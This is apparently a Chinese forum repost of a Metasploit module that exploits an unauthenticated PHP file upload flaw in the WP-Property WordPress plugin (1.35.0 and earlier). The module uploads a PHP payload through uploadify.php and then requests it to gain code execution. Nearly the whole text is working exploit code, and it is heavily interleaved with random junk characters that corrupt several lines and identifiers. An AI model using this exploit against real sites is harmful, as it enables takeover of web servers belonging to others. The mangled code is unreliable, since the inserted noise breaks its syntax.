WordPress WP-Property PHP 文件上传漏洞+ X D+ u; w2 |' K5 s5 p
1 ]9 x. U2 }8 h) {3 |
## # This file is part of the Metasploit Framework and may be subject to
! h# a1 [2 W2 N
S& v, \5 o: ^# redistribution and commercial restrictions. Please see the Metasploit
: {5 m! ~- d' G2 u
: G# N! S$ `! z2 m$ Q. h# Framework web site for more information on licensing and terms of use.% d" u8 I5 f& h5 `# a
/ \; _! m; p) w* p, `) W0 }3 e
# http://metasploit.com/framework/ ##
7 v# v8 W. M/ t! B. k% h. d, J+ I% h& K2 ]* v' g
* ]. p9 z, x7 F5 C# \6 [8 Z
7 z# V6 f' m' b! z " V) T4 ]6 \3 z4 H
' J5 D" U1 u7 H8 k' ^9 L0 Irequire 'msf/core'
) W6 X& d% |1 \3 k& x1 Arequire 'msf/core/exploit/php_exe'! |3 \# h, x# V1 g6 W
, p6 ~1 D8 @# ]- S3 e9 xclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',/ f: D( }% ~4 c# w1 g9 z# X
'Description' => %q{+ j- }3 N4 @& E8 X. J# b3 K
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>7 R% K% v* B- {
[4 i' E r/ j$ \7 ^1 Q w& @
'Sammy FORGIT', # initial discovery- S8 W4 i/ l' X" s; T t) B
'James Fitts <fitts.james[at]gmail.com>' # metasploit module( x) r' Z1 E& y7 \1 z d6 R
],
6 T, ^ ]! F, Y'License' => MSF_LICENSE,+ T7 h' e9 [- p) D2 G
'References' =>
6 A& I. B* T! K! g* L[
! F _5 y3 t' E- V- j[ 'OSVDB', '82656' ],0 \, \0 v/ ?' p2 V) K& i$ [
[ 'BID', '53787' ],6 X" s9 z9 L. t+ L4 W
[ 'EDB', '18987'],4 f# T/ c: o) V2 Q3 P
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]& ^ ~0 Z* B- ?$ t2 ^
],
& Y# U: ], y+ ^/ z'Payload' =>! |, v. A5 E& p
{
4 r1 a! p4 E/ a6 M4 e; f'BadChars' => "\x00",
/ |. R- S$ r8 [* k/ r},1 Z( Y( l+ N( r8 L
'Platform' => 'php',- P4 ?* }6 m6 _9 O
'Arch' => ARCH_PHP,. b7 J+ X' m" P" |$ X3 H
'Targets' =>
. e1 j: N7 P) S4 X' }1 v/ B$ s1 z: R[
. Q+ H: B! Q6 z3 k8 z; a[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],4 g" C$ X' y+ I; q
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
( d3 j# H3 p! e3 e! a/ N],
; j# A+ [7 ?( R+ G* S'DefaultTarget' => 0,
# q2 y1 ^2 T2 A' `" U'DisclosureDate' => 'Mar 26 2012'))
% @/ E2 V: U* F6 i7 {
; m/ ~8 f5 F6 R( oregister_options(* ~7 }. z+ }/ o0 l
[
$ s$ c" g- a; ^OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])) ~- {( A0 m+ ~/ _# G6 w
], self.class)0 ~0 K4 j/ K3 x u, e2 S3 h' w
end1 c. W$ t2 x' V' K/ t- o" k
+ k$ [4 `; w: x/ Z, f) udef check
3 h* T4 l9 m; o/ Ouri = target_uri.path4 o% ~, E4 G2 T# {7 ^# [! r
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',0 c+ u+ o3 {- C( S
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"8 M. d c7 H: n P1 |3 @
})
! l3 q' v" s' \( W2 N c5 ^5 w1 H. z' A( \/ k) E
if not res or res.code != 200
5 L, u2 I" p( z1 y) a; k5 s5 s. _return Exploit::CheckCode::Unknown& u5 D- K6 {3 r' {
end
, A- ~0 _% T7 O% ^4 x
2 h9 N: w. Z3 F2 T$ a* creturn Exploit::CheckCode::Appears
7 q% i, H4 w: W# y# L9 L1 P: A Send
0 b ?! S+ x: W) l* z3 E0 A+ G6 r( a1 G9 K
def exploit
$ T0 j! f- W9 s2 M3 Ruri = target_uri.path
% U. |! H& G$ O9 t8 Euri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)' ^) `& `0 T, K( |4 q
7 g% W2 @; x6 ~# adata = Rex::MIME::Message.new
& ]* _! [6 Z5 F8 a3 g5 w" {data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
" t n v' V' ]: ndata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")6 M; h5 i. Q) S
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')& H0 b* z4 q) X% j
$ Y/ _$ b4 x* D' v
print_status("#{peer} - Uploading payload #{@payload_name}")
4 P/ m( R1 P: u1 Kres = send_request_cgi({
0 ?% P9 n2 a# a0 r1 _0 R'method' => 'POST',
( x F2 _2 N0 l, Y( T'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",+ { Q4 j ^5 S |
'ctype' => "multipart/form-data; boundary=#{data.bound}",3 C' d2 x" e" f9 N I u
'data' => post_data
i. Y/ [+ W! d7 ^8 x})
& m; m$ [4 M5 ?* S+ G
' n; o2 a1 N k Z S& Vif not res or res.code != 200 or res.body !~ /#{@payload_name}// e- D/ U5 f% Q4 V: E! [
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")* _# N; h; o( Y& c, n$ t% _
end
- ]+ t& ]1 r3 `. `6 v. {8 X" y3 b; g7 I
upload_uri = res.body e4 T, z2 ^1 Y0 E( ]
# t; F7 Z8 x' |( |! Fprint_status("#{peer} - Executing payload #{@payload_name}")
0 u, W& }# m+ b6 ^' ?res = send_request_raw({
) e& @. L* I/ R1 S- d6 B% G6 ^'uri' => upload_uri,
2 T/ i3 X8 z9 c" r5 H: z'method' => 'GET'8 L2 b/ W" c( x& Q2 M
})( d. \$ a& l5 a* u8 X
end+ N- E7 T l% v3 q6 ]$ {3 _% y% n
end6 c+ P, s& q- ~# H, B
" C) p) V+ b# j' d1 b& B8 m1 W不要问我这写的是什么 怎么利用 我是说msf.
; [ M. |: ]3 K& r2 N) ^- E5 k* T4 Z& x$ X( |: s% e* t# M
|